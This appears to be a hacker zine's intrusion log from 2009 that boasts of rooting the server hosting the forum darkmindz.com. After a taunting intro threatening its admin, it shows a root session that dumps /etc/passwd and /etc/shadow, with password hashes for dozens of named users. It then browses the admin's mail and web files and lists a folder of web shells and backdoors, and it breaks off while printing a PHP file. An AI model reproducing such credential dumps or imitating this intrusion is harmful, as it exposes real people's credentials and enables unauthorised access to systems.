root 25085 0.0 0.0 3920 700 pts/1 S+ 11:27 0:00 grep -r screen
root@server [/var/run/screen]# ps -aux | grep -i screen
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
root 13472 0.0 0.0 5056 1064 ? Ss Jun10 0:00 SCREEN
root 25147 0.0 0.0 3920 680 pts/1 R+ 11:27 0:00 grep -i screen
root@server [/var/run/screen]#
_______ ________________
\ _ \ ___ __\ _ \______ \
/ /_\ \\ \/ / /_\ \ / /
\ \_/ \> <\ \_/ \/ /
\_____ /__/\_ \\_____ /____/
\/ \/ \/
.___ __ .__ .___
__| _/____ _______| | __ _____ |__| ____ __| _/_______
/ __ |\__ \\_ __ \ |/ // \| |/ \ / __ |\___ / ______
/ /_/ | / __ \| | \/ <| Y Y \ | | \/ /_/ | / / /_____/
\____ |(____ /__| |__|_ \__|_| /__|___| /\____ |/_____ \
\/ \/ \/ \/ \/ \/ \/
____________ .________
_________/ ____\ _ \ | ____/
\___ /\ __\/ /_\ \ |____ \
/ / | | \ \_/ \/ \
/_____ \ |__| \_____ /______ /
\/ \/ \/
|
\ / _\/_
darkmindz .-'-. //o\ _\/_
-- / \ -- | /o\\
^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
We eat the night, we drink the time |
Make our dreams come true
And hungry eyes are passing by
On streets we call the zoo
Darkmindz.com was just another "haxor" AKA idiot breeding ground forum run by
the infamous saudi named RoMeO. Fortunetly due to the recent events RoMeO
decided to kill his site and handle because he was sloppy & cocky enough to link
his anti-sec activities with his public internet "life". This has spared us the
trouble of needing to rm -rf /* his shit, so thx RoMeO, hope we can be friends.
We didn't want a good hax.log to go to waste so we decided to publish darkmindz
anyways.
RoMeO is a blackhat wannabe and gave us good lulz with astalavista, props to
that, but who the fuck is/was ssanz anyway and what's the point of spreading
anti-sec propaganda via imageshack? You can't enjoy the benefits of a blackhat
and run some retarded haxor forum at the same time pal, good to see that you
realized that. But in any case if you decide to put your shitty forum online
again, you will be rm'ed.
Here's what we found in darkmindz land.
root@www.darkmindz.com's password:
Last login: Sat May 23 03:39:06 2009 from cpe-76-175-20-182.socal.res.rr.com
ALERT! You are entering a secured area! Your IP and login information
have been recorded. System administration has been notified.
This system is restricted to authorized access only. All activities on
this system are recorded and logged. Unauthorized access will be fully
investigated and reported to the appropriate law enforcement agencies.
root@server2:~[root@server2 ~]# uname -a; id
Linux server2.hr-development.net 2.6.27.10-grsec #1 SMP Fri May 15 21:34:11 PDT
2009 x86_64 x86_64 x86_64 GNU/Linux
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel)
root@server2:~[root@server2 ~]# #who up in this mother fucker
root@server2:~[root@server2 ~]# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
webapps:x:500:501::/var/www/html:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
dovecot:x:104:104::/home/dovecot:/bin/bash
admin:x:501:502::/home/admin:/bin/bash
hrdev:x:502:503::/home/hrdev:/bin/false
keytraderz:x:504:505::/home/keytraderz:/bin/false
yourkicks:x:507:508::/home/yourkicks:/bin/false
aaa:x:508:509::/home/aaa:/bin/false
beyond:x:509:510::/home/beyond:/bin/false
hotglow:x:510:511::/home/hotglow:/bin/false
wheelglow:x:512:513::/home/wheelglow:/bin/false
penguin:x:513:514::/home/penguin:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
furiogamin:x:516:517::/home/furiogamin:/bin/false
kaza:x:517:518::/home/kaza:/bin/false
pimpinjg:x:518:519::/home/pimpinjg:/bin/false
dakilla:x:521:522::/home/dakilla:/bin/false
bootroot:x:522:523::/home/bootroot:/bin/false
scraft758:x:525:526::/home/scraft758:/bin/false
hstrike:x:526:527::/home/hstrike:/bin/false
romeo:x:528:529::/home/romeo:/bin/false
xckx:x:529:530::/home/xckx:/bin/false
h3mod:x:530:531::/home/h3mod:/bin/false
clamav:x:533:534:Clam AntiVirus:/home/clamav:/bin/false
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:105:105:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
hbxmike:x:535:536::/home/hbxmike:/bin/false
wtfsmilez:x:536:537::/home/wtfsmilez:/bin/false
haiobr:x:537:538::/home/haiobr:/bin/false
odin:x:538:539::/home/odin:/bin/false
sam:x:539:540::/home/sam:/bin/false
mrgod:x:540:541::/home/mrgod:/bin/false
pagewiz:x:541:542::/home/pagewiz:/bin/false
zer0:x:542:543::/home/zer0:/bin/false
dablitz:x:543:544::/home/dablitz:/bin/false
ristop:x:544:545::/home/ristop:/bin/false
bloo:x:545:546::/home/bloo:/bin/false
root:$1$tilqrnIQ$fm2riVHK6dHchHIblFr/f1:14380:0:99999:7:::
bin:*:14253:0:99999:7:::
daemon:*:14253:0:99999:7:::
shutdown:*:14253:0:99999:7:::
halt:*:14253:0:99999:7:::
mail:*:14253:0:99999:7:::
ftp:*:14253:0:99999:7:::
nobody:*:14253:0:99999:7:::
dbus:!!:14253:0:99999:7:::
nscd:!!:14253:0:99999:7:::
vcsa:!!:14253:0:99999:7:::
rpc:!!:14253:0:99999:7:::
sshd:!!:14253:0:99999:7:::
pcap:!!:14253:0:99999:7:::
mailnull:!!:14253:0:99999:7:::
smmsp:!!:14253:0:99999:7:::
rpcuser:!!:14253:0:99999:7:::
nfsnobody:!!:14253:0:99999:7:::
rpm:!!:14253:0:99999:7:::
haldaemon:!!:14253:0:99999:7:::
named:!!:14257::::::
apache:!!:14257::::::
diradmin:!!:14256::::::
mysql:!!:14256::::::
webapps:!!:14256:0:99999:7:::
majordomo:!!:14256::::::
dovecot:!!:14256::::::
admin:$1$hOf0pEJ7$Csc3Cf1boad5jK8A4.gCe1:14379:0:99999:7:::
hrdev:$1$h66VePH.$Q18XKJHV0qQekrkx8DNPa.:14269:0:99999:7:::
keytraderz:$1$apmWxy/L$YuzBwBVn6o87A7gAqMUfj0:14369:0:99999:7:::
yourkicks:$1$IeMgb1QU$qNEVNIQDzjgW5Wt.V5cNs.:14269:0:99999:7:::
aaa:$1$Pvq5Ze1q$Nn1bNt8aTVT7VaBCZFuMr1:14269:0:99999:7:::
beyond:$1$gYlYPXOA$qMQTQ0gTMkqkeI3exuI5F0:14269:0:99999:7:::
hotglow:$1$UL8Osrrl$pKpDOHKiBcj2a5NBN1n1M1:14269:0:99999:7:::
wheelglow:$1$7CfmCRZb$TXXEzsFamBKkk7L10qKEn1:14269:0:99999:7:::
penguin:!$1$NKcb5Ati$z.YERAUu8ADbbo8XId6.e.:14269:0:99999:7:::
ntp:!!:14273::::::
furiogamin:$1$ehClK7ld$2OchIgSTZ1wnYgJnWJe1L/:14278:0:99999:7:::
kaza:$1$QU9IN8sS$cypmbg45B0V0k/a6knhzD0:14278:0:99999:7:::
pimpinjg:$1$D0PGDf.U$6IyagtS0AYLnTXI4DiPmh1:14291:0:99999:7:::
dakilla:$1$Foh0gQdF$NDc4LO/3Otwxt.WXNGb8u1:14383:0:99999:7:::
bootroot:$1$YG4ZItt0$JYuixhSHo9KcJbdm4rumt.:14364:0:99999:7:::
scraft758:$1$BD72wrXX$3SarFSWt249OF71EugOvp1:14292:0:99999:7:::
hstrike:$1$roWSxdvs$X6QfaV/NhsXwqBCTFksL/0:14292:0:99999:7:::
romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
xckx:$1$NsnILOqK$3mGncK6wPMYMsb9vnkOyt/:14293:0:99999:7:::
h3mod:$1$XQo0rcc3$lmySsVMTrIC0ePWPXfOR2/:14293:0:99999:7:::
clamav:!!:14336:0:99999:7:::
avahi:!!:14336::::::
avahi-autoipd:!!:14336::::::
hbxmike:$1$PriF/4Bk$1.j6gBej9aPfrN4BJeDU11:14376:0:99999:7:::
wtfsmilez:$1$NJsG5rdb$X.EqYJhBhWhuAjteubXEK/:14365:0:99999:7:::
haiobr:$1$8WRmEqZ.$.shT4ddM9WHSteJ197DjE1:14385:0:99999:7:::
odin:$1$z5xA/a5f$x4VoN/NQhQshmAei3bZj4.:14379:0:99999:7:::
sam:$1$hQ9R7M26$pDBdZDh01EtAV1DxELrnc1:14376:0:99999:7:::
mrgod:$1$WmNO8283$hpvrrWLnd5Pp/RlcwYvnm/:14377:0:99999:7:::
pagewiz:$1$LgyU4TyH$kpQ.QEZ3mVv.nZQKvzrui0:14383:0:99999:7:::
zer0:$1$KMAddC48$OTyb50QllFSKp4AR4AcsC0:14385:0:99999:7:::
dablitz:$1$xUPbImWk$hDT9R4UAwbsQVyGxpZ.pu/:14386:0:99999:7:::
ristop:$1$9SfY3MtY$n8cHnCN6tY2WvhitNOykh.:14386:0:99999:7:::
bloo:$1$TtV5Q9IB$gi9SWdREB1ikky.Cgmiuu/:14387:0:99999:7:::
root@server2:~[root@server2 ~]# grep romeo /etc/shadow
romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
root@server2:~[root@server2 ~]# w
04:05:41 up 18:48, 1 user, load average: 0.34, 0.34, 0.23
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 cpe-76-1x5-xx-xx 03:39 26:24 0.00s 0.00s -bash
root@server2:~[root@server2 ~]# ls -al
total 30488
drwxr-x--- 11 root root 4096 May 23 02:47 .
drwx--x--x 25 root root 4096 May 22 09:26 ..
-rw------- 1 root root 1132 Mar 11 01:44 anaconda-ks.cfg
-rw-r--r-- 1 root root 0 May 20 17:26 authorized_keys2
-rwxr-xr-x 1 root root 10 May 23 03:02 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
drwxrwxrwx 24 1000 1000 4096 Apr 28 14:55 clamav-0.95.1
-rw-r--r-- 1 root root 24260964 Apr 8 08:24 clamav-0.95.1.tar.gz
-rw-r--r-- 1 root root 171053 May 22 13:49 cleaned_shells_php.txt
drwxr-xr-x 4 root root 4096 Mar 18 00:50 .cpan
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
-rw-r--r-- 1 root root 4 Jan 12 16:21 .custombuild
-rwxr-xr-x 1 root root 21171 Jan 13 14:13 da.cpanel.import.pl
-rw-r--r-- 1 root root 288 Mar 31 05:21 defaults.conf
drwxr-xr-x 2 root root 4096 Mar 23 19:03 export
-rw-r--r-- 1 root root 1155 May 15 22:15 f.c
drwxr-xr-x 3 root root 4096 May 12 20:35 forum
-rw-r--r-- 1 root root 265 May 14 15:19 ifconfig
drwxr-xr-x 2 root root 4096 Mar 23 19:03 import
-rw------- 1 root root 12288 Mar 27 04:26 .import.swp
-rw-r--r-- 1 root root 1724 Apr 1 18:53 initsec
-rw------- 1 root root 97 May 23 04:02 .lesshst
-rw-r--r-- 1 root root 27 May 23 02:35 load
-rw------- 1 root root 42 Feb 5 17:18 .my.cnf
-rw------- 1 root root 37 May 2 15:19 .mysql_history
-rw-r--r-- 1 root root 9 Mar 31 05:21 .mytop
drwxr-xr-x 16 webapps apache 4096 Apr 28 16:11 nmap-4.85BETA8
-rw-r--r-- 1 root root 6484436 Apr 21 14:38 nmap-4.85BETA8.tar.bz2
drwxr-xr-x 3 root root 4096 May 20 14:31 qurantine
-rw------- 1 root root 1024 Apr 2 18:01 .rnd
-rwxr-xr-x 1 root root 2024 Apr 28 14:44 scan.pl
drwx------ 2 root root 4096 May 20 15:00 .ssh
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
-rw------- 1 root root 12288 May 23 03:02 .test.swp
drwxr-xr-x 2 root root 4096 May 14 14:00 tmp
-rwxr-xr-x 1 root root 47429 May 16 2008 tuning-primer.sh
root@server2:~[root@server2 ~]# cat .bash_history
exit
exit
root@server2:~[root@server2 ~]# #omg nmap, SECURE HOSTING
root@server2:~[root@server2 ~]# date
Sat May 23 04:06:57 PDT 2009
root@server2:~[root@server2 ~]# cd /home/romeo/
root@server2:/home/romeo[root@server2 romeo]# ls -al
total 44
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 .
drwx--x--x 36 root root 4096 May 23 02:33 ..
drwx------ 2 romeo romeo 4096 Feb 17 16:07 backups
-rw-r--r-- 1 romeo romeo 33 Dec 22 09:57 .bash_logout
-rw-r--r-- 1 romeo romeo 176 Dec 22 09:57 .bash_profile
-rw-r--r-- 1 romeo romeo 124 Dec 22 09:57 .bashrc
-rw------- 1 romeo romeo 0 Feb 8 08:45 .clipboard.txt
drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 domains
drwxrwx--- 4 romeo mail 4096 Feb 17 16:07 imap
drwxrwx--- 5 romeo mail 4096 Dec 23 08:29 Maildir
lrwxrwxrwx 1 romeo romeo 35 Feb 17 16:07 public_html ->
./domains/darkmindz.com/public_html
-rw-r----- 1 romeo mail 34 Apr 19 16:26 .shadow
root@server2:/home/romeo[root@server2 romeo]# du -ch Maildir/
4.0K Maildir/tmp
68M Maildir/new
4.0K Maildir/cur
68M Maildir/
68M total
root@server2:/home/romeo[root@server2 romeo]# #nice, thanks
root@server2:/home/romeo[root@server2 romeo]# cd domains
root@server2:/home/romeo/domains[root@server2 domains]# ls -la
total 16
drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com
root@server2:/home/romeo/domains[root@server2 domains]# cd darkmindz.com
root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# ls
-la
total 40
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 .
drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 ..
drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 .htpasswd
drwxr-xr-x 2 root root 4096 May 23 00:10 logs
drwx--x--x 3 romeo romeo 4096 Dec 22 09:57 public_ftp
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 public_html
drwxr-xr-x 2 root root 4096 May 1 00:10 stats
-rw-r--r-- 1 romeo romeo 12151 Feb 9 09:01 view_topic.php
root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# cd
public_html/
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -al
total 47264
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 .
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 ..
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 400.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 401.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 403.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 404.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 500.shtml
-rw-r--r-- 1 romeo romeo 5254 Feb 14 06:12 acp.php
-rw-r--r-- 1 romeo romeo 9757 Feb 14 06:12 ajax.php
-rw-r--r-- 1 romeo romeo 2118 Feb 14 06:12 articles.php
drwxr-xr-x 2 romeo romeo 4096 Mar 4 11:11 _beta
drwxrwxrwx 5 romeo romeo 4096 Mar 26 15:55 cache
drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 cgi-bin
-rw-r--r-- 1 romeo romeo 5561 Feb 14 06:12 challenges.php
-rw-r--r-- 1 romeo romeo 2137 Feb 2 08:43 codebase.php
-rw-r--r-- 1 romeo romeo 17251 Jan 13 07:21 convertor.php
drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 core
-rw-r--r-- 1 romeo romeo 0 Jan 13 07:21 debug
-rw-r--r-- 1 romeo romeo 3266 Dec 22 22:59 eg.gif
-rw-r--r-- 1 romeo romeo 5036 Feb 27 17:58 forgotpass.php
-rw-r--r-- 1 romeo romeo 7107 Mar 1 11:30 forum.php
-rw-r--r-- 1 romeo romeo 2177 Jan 13 07:21 get_shouts.php
-rw-r--r-- 1 romeo romeo 1416102 Feb 17 14:24 halo.zip
-rw-r--r-- 1 romeo romeo 4546 Feb 19 14:07 .htaccess
-rw-r--r-- 1 romeo romeo 36 Jan 13 06:52 .htpasswd
drwxr-xr-x 4 romeo romeo 4096 Feb 8 20:35 images
drwxr-xr-x 2 romeo romeo 4096 Dec 22 22:20 img
-rw-r--r-- 1 romeo romeo 3998 Apr 19 16:40 index.php
-rw-r--r-- 1 romeo romeo 843 Feb 28 15:13 irc.php
drwxr-xr-x 3 romeo romeo 4096 Feb 7 13:38 language
-rw-r--r-- 1 romeo romeo 4103 Feb 19 14:05 latest_posts.php
-rwxrwxrwx 1 romeo romeo 7184 Feb 14 06:12 loader.php
-rw-r--r-- 1 romeo romeo 8398 Feb 14 06:12 login.php
-rwxr-xr-x 1 romeo romeo 13954 Sep 15 2006 logo.jpg
-rw-r--r-- 1 romeo romeo 3006 Feb 1 21:44 merge.php
drwxr-xr-x 20 romeo romeo 4096 Feb 12 13:44 modules
-rw-r--r-- 1 romeo romeo 10964 Feb 14 12:40 pastebin.php
-rw-r--r-- 1 romeo romeo 31019 Feb 14 06:12 post.bak.php
-rw-r--r-- 1 romeo romeo 35322 Feb 21 08:56 post.php
-rw-r--r-- 1 romeo romeo 2142 Feb 14 06:12 privatemessages.php
-rw-r--r-- 1 romeo romeo 9747 Feb 22 13:10 register.php
-rw-r--r-- 1 romeo romeo 7919 Mar 16 20:00 rss.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 scripts
-rw-r--r-- 1 romeo romeo 1065 Feb 14 06:12 search.php
-rw-r--r-- 1 romeo romeo 1838 Feb 14 06:12 settings.php
drwxr-xr-x 2 root root 4096 May 20 14:30 shell
-rw-r--r-- 1 romeo romeo 46487316 May 23 04:07 stress_test.txt
-rw-r--r-- 1 romeo romeo 994 Jan 13 07:22 swiigle_upload.php
drwxr-xr-x 5 romeo romeo 4096 Feb 7 13:38 template
-rw-r--r-- 1 romeo romeo 454 Jan 13 07:22 template.php
drwxr-xr-x 2 romeo romeo 4096 Feb 16 21:05 templates
-rw-r--r-- 1 romeo romeo 610 Feb 18 08:17 test.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 txt docs
-rw-r--r-- 1 romeo romeo 2708 Feb 14 06:12 ucp.php
-rw-r--r-- 1 romeo romeo 7789 Feb 14 06:12 view_group.bak.php
-rw-r--r-- 1 romeo romeo 8556 Mar 1 11:30 view_group.php
-rw-r--r-- 1 romeo romeo 876 Feb 14 06:12 view_profile.php
-rw-r--r-- 1 romeo romeo 12677 Feb 14 13:16 view_topic.bak.php
-rw-r--r-- 1 romeo romeo 12871 Mar 1 11:30 view_topic.php
-rw-r--r-- 1 romeo romeo 9571 Feb 14 06:12 windowed_options.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -la scripts/
total 476
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 .
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 ..
-rw-r--r-- 1 romeo romeo 4770 Jan 13 12:11 builder.js
-rw-r--r-- 1 romeo romeo 588 Jan 13 12:11 cli.js
-rw-r--r-- 1 romeo romeo 35851 Jan 13 12:12 controls.js
-rw-r--r-- 1 romeo romeo 35253 Jan 13 12:11 dragdrop.js
-rw-r--r-- 1 romeo romeo 38986 Jan 13 12:12 effects.js
-rw-r--r-- 1 romeo romeo 8663 Feb 14 12:40 functions.js
-rw-r--r-- 1 romeo romeo 6897 Jan 13 12:11 growl.js
-rw-r--r-- 1 romeo romeo 63854 Jan 13 12:11 lightwindow.js
-rw-r--r-- 1 romeo romeo 52665 Jan 13 12:12 php.min.js
-rw-r--r-- 1 romeo romeo 1457 Jan 13 12:11 pm.js
-rw-r--r-- 1 romeo romeo 1637 Jan 13 12:11 pngfix.js
-rw-r--r-- 1 romeo romeo 3261 Jan 13 12:11 proto.menu.js
-rw-r--r-- 1 romeo romeo 130380 Jan 13 12:12 prototype.js
-rw-r--r-- 1 romeo romeo 2733 Jan 13 12:11 register.js
-rw-r--r-- 1 romeo romeo 2711 Jan 13 12:11 scriptaculous.js
-rw-r--r-- 1 romeo romeo 121 Jan 13 12:11 shoutbox.js
-rw-r--r-- 1 romeo romeo 10296 Jan 13 12:12 slider.js
-rw-r--r-- 1 romeo romeo 1920 Jan 13 12:12 sound.js
-rw-r--r-- 1 romeo romeo 20197 Jan 13 12:12 unittest.js
-rw-r--r-- 1 romeo romeo 6145 Feb 14 12:40 user.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -la shell/
total 1564
drwxr-xr-x 2 root root 4096 May 20 14:30 .
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 ..
-rw-r--r-- 1 romeo romeo 1297 Feb 16 21:05 ajan.txt
-rw-r--r-- 1 romeo romeo 44210 Feb 16 21:06 b64.txt
-rw-r--r-- 1 romeo romeo 140 Feb 16 21:06 backdoor.txt
-rw-r--r-- 1 romeo romeo 11141 Feb 16 21:06 c101.txt
-rw-r--r-- 1 romeo romeo 1468 Feb 16 21:06 cmd.txt
-rw-r--r-- 1 romeo romeo 18519 Feb 16 21:06 codeanalyzer.txt
-rw-r--r-- 1 romeo romeo 114861 Feb 16 21:06 constance.txt
-rw-r--r-- 1 romeo romeo 40682 Feb 16 21:06 CrystalShell v.1.txt
-rw-r--r-- 1 romeo romeo 83029 Feb 16 21:06 CyberSpy5.txt
-rw-r--r-- 1 romeo romeo 43394 Feb 16 21:06 dC3 Security Crew Shell PRiV.txt
-rw-r--r-- 1 romeo romeo 111446 Feb 16 21:06 DxShell.1.0.txt
-rw-r--r-- 1 romeo romeo 39433 Feb 16 21:06 eko.txt
-rw-r--r-- 1 romeo romeo 38479 Feb 16 21:06 ELMALISEKER Backd00r.txt
-rw-r--r-- 1 romeo romeo 24829 Feb 16 21:06 GFS web-shell ver 3.1.7 -
PRiV8.txt
-rw-r--r-- 1 romeo romeo 2089 Feb 16 21:06 imageshell.JPG
-rw-r--r-- 1 romeo romeo 1768 Feb 16 21:06 index.php
-rw-r--r-- 1 romeo romeo 17440 Feb 16 21:06 kscript.txt
-rw-r--r-- 1 romeo romeo 2342 Feb 16 21:06 l0ger.txt
-rw-r--r-- 1 romeo romeo 1683 Feb 16 21:06 LocalLinuxExploitFinder.txt
-rw-r--r-- 1 romeo romeo 33796 Feb 16 21:06 Mysql interface v1.0.txt
-rw-r--r-- 1 romeo romeo 34398 Feb 16 21:06 mysql.txt
-rw-r--r-- 1 romeo romeo 38856 Feb 16 21:06 ntdaddy.txt
-rw-r--r-- 1 romeo romeo 124953 Feb 16 21:06 r57.txt
-rw-r--r-- 1 romeo romeo 103794 Feb 16 21:06 SnIpEr_SA Shell.txt
-rw-r--r-- 1 romeo romeo 7002 Feb 16 21:06 steg.txt
-rw-r--r-- 1 romeo romeo 139788 Feb 16 21:06 tdshell.txt
-rw-r--r-- 1 romeo romeo 70402 Feb 16 21:06 webadmin.txt
-rw-r--r-- 1 romeo romeo 5057 Feb 16 21:06 WinX Shell.txt
-rw-r--r-- 1 romeo romeo 2455 Feb 16 21:06 Worse Linux Shell.txt
-rw-r--r-- 1 romeo romeo 304936 Feb 16 21:06 x2300_mod.txt
-rw-r--r-- 1 romeo romeo 10418 Feb 16 21:06 XSSscan.py.txt
-rw-r--r-- 1 romeo romeo 10269 Feb 16 21:06 xx.txt
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# #ELEET
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -al
total 47264
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 .
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 ..
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 400.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 401.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 403.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 404.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 500.shtml
-rw-r--r-- 1 romeo romeo 5254 Feb 14 06:12 acp.php
-rw-r--r-- 1 romeo romeo 9757 Feb 14 06:12 ajax.php
-rw-r--r-- 1 romeo romeo 2118 Feb 14 06:12 articles.php
drwxr-xr-x 2 romeo romeo 4096 Mar 4 11:11 _beta
drwxrwxrwx 5 romeo romeo 4096 Mar 26 15:55 cache
drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 cgi-bin
-rw-r--r-- 1 romeo romeo 5561 Feb 14 06:12 challenges.php
-rw-r--r-- 1 romeo romeo 2137 Feb 2 08:43 codebase.php
-rw-r--r-- 1 romeo romeo 17251 Jan 13 07:21 convertor.php
drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 core
-rw-r--r-- 1 romeo romeo 0 Jan 13 07:21 debug
-rw-r--r-- 1 romeo romeo 3266 Dec 22 22:59 eg.gif
-rw-r--r-- 1 romeo romeo 5036 Feb 27 17:58 forgotpass.php
-rw-r--r-- 1 romeo romeo 7107 Mar 1 11:30 forum.php
-rw-r--r-- 1 romeo romeo 2177 Jan 13 07:21 get_shouts.php
-rw-r--r-- 1 romeo romeo 1416102 Feb 17 14:24 halo.zip
-rw-r--r-- 1 romeo romeo 4546 Feb 19 14:07 .htaccess
-rw-r--r-- 1 romeo romeo 36 Jan 13 06:52 .htpasswd
drwxr-xr-x 4 romeo romeo 4096 Feb 8 20:35 images
drwxr-xr-x 2 romeo romeo 4096 Dec 22 22:20 img
-rw-r--r-- 1 romeo romeo 3998 Apr 19 16:40 index.php
-rw-r--r-- 1 romeo romeo 843 Feb 28 15:13 irc.php
drwxr-xr-x 3 romeo romeo 4096 Feb 7 13:38 language
-rw-r--r-- 1 romeo romeo 4103 Feb 19 14:05 latest_posts.php
-rwxrwxrwx 1 romeo romeo 7184 Feb 14 06:12 loader.php
-rw-r--r-- 1 romeo romeo 8398 Feb 14 06:12 login.php
-rwxr-xr-x 1 romeo romeo 13954 Sep 15 2006 logo.jpg
-rw-r--r-- 1 romeo romeo 3006 Feb 1 21:44 merge.php
drwxr-xr-x 20 romeo romeo 4096 Feb 12 13:44 modules
-rw-r--r-- 1 romeo romeo 10964 Feb 14 12:40 pastebin.php
-rw-r--r-- 1 romeo romeo 31019 Feb 14 06:12 post.bak.php
-rw-r--r-- 1 romeo romeo 35322 Feb 21 08:56 post.php
-rw-r--r-- 1 romeo romeo 2142 Feb 14 06:12 privatemessages.php
-rw-r--r-- 1 romeo romeo 9747 Feb 22 13:10 register.php
-rw-r--r-- 1 romeo romeo 7919 Mar 16 20:00 rss.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 scripts
-rw-r--r-- 1 romeo romeo 1065 Feb 14 06:12 search.php
-rw-r--r-- 1 romeo romeo 1838 Feb 14 06:12 settings.php
drwxr-xr-x 2 root root 4096 May 20 14:30 shell
-rw-r--r-- 1 romeo romeo 46488303 May 23 04:08 stress_test.txt
-rw-r--r-- 1 romeo romeo 994 Jan 13 07:22 swiigle_upload.php
drwxr-xr-x 5 romeo romeo 4096 Feb 7 13:38 template
-rw-r--r-- 1 romeo romeo 454 Jan 13 07:22 template.php
drwxr-xr-x 2 romeo romeo 4096 Feb 16 21:05 templates
-rw-r--r-- 1 romeo romeo 610 Feb 18 08:17 test.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 txt docs
-rw-r--r-- 1 romeo romeo 2708 Feb 14 06:12 ucp.php
-rw-r--r-- 1 romeo romeo 7789 Feb 14 06:12 view_group.bak.php
-rw-r--r-- 1 romeo romeo 8556 Mar 1 11:30 view_group.php
-rw-r--r-- 1 romeo romeo 876 Feb 14 06:12 view_profile.php
-rw-r--r-- 1 romeo romeo 12677 Feb 14 13:16 view_topic.bak.php
-rw-r--r-- 1 romeo romeo 12871 Mar 1 11:30 view_topic.php
-rw-r--r-- 1 romeo romeo 9571 Feb 14 06:12 windowed_options.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# cat test.php
<?php
/*======================================================================*\
| Cybershade CMS - Your CMS, Your Way |
\*======================================================================*/
define('INDEX_CHECK', 1);
define('CMS_DEBUG', 0);
define('CMS_MENU', 'forum');
